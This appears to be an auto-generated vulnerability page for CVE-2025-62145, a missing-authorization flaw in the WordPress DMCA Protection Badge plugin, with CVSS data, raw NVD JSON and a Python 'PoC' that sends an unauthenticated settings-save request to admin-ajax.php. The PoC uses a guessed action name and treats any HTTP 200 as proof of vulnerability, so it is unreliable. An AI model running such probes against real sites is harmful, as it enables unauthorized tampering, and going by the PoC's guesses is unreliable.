Security Vulnerability Report
中文
CVE-2025-62145 CVSS 5.3 MEDIUM

CVE-2025-62145

Published: 2025-12-31 15:15:53
Last Modified: 2026-04-23 15:34:38

Description

Missing Authorization vulnerability in NewClarity DMCA Protection Badge dmca-badge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DMCA Protection Badge: from n/a through <= 2.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

DMCA Protection Badge <= 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62145 PoC - DMCA Protection Badge Missing Authorization # Target: WordPress site with DMCA Protection Badge plugin <= 2.2.0 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-62145 Missing Authorization vulnerability in DMCA Protection Badge plugin """ # Common WordPress admin-ajax.php endpoint admin_ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Common plugin endpoints that might be affected endpoints = [ f"{target_url}/wp-content/plugins/dmca-badge/admin/class-dmca-badge-admin.php", f"{target_url}/wp-json/dmca-badge/v1/settings", f"{target_url}/wp-admin/admin.php?page=dmca-badge-settings" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-62145 - Missing Authorization in DMCA Protection Badge") # Test unauthenticated access to plugin functions # This exploits the missing authorization check headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } # Example: Try to access admin functionality without authentication # Adjust the action parameter based on actual vulnerable endpoint test_data = { 'action': 'dmca_badge_save_settings', 'nonce': '', # No nonce required due to missing authorization } try: print(f"[*] Sending unauthenticated request to admin-ajax.php...") response = requests.post(admin_ajax_url, data=test_data, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] Potential vulnerability detected!") print(f"[!] Status code: {response.status_code}") print(f"[!] Response: {response.text[:200]}") return True else: print(f"[-] Request returned status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-site.com" is_vulnerable = check_vulnerability(target) if is_vulnerable: print("\n[!] Target appears to be vulnerable to CVE-2025-62145") print("[!] Recommendation: Update DMCA Protection Badge to latest version") else: print("\n[-] Target does not appear to be vulnerable or plugin not found")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62145", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:53.210", "lastModified": "2026-04-23T15:34:37.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in NewClarity DMCA Protection Badge dmca-badge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DMCA Protection Badge: from n/a through <= 2.2.0."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en NewClarity DMCA Protection Badge permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a DMCA Protection Badge: desde n/a hasta 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dmca-badge/vulnerability/wordpress-dmca-protection-badge-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}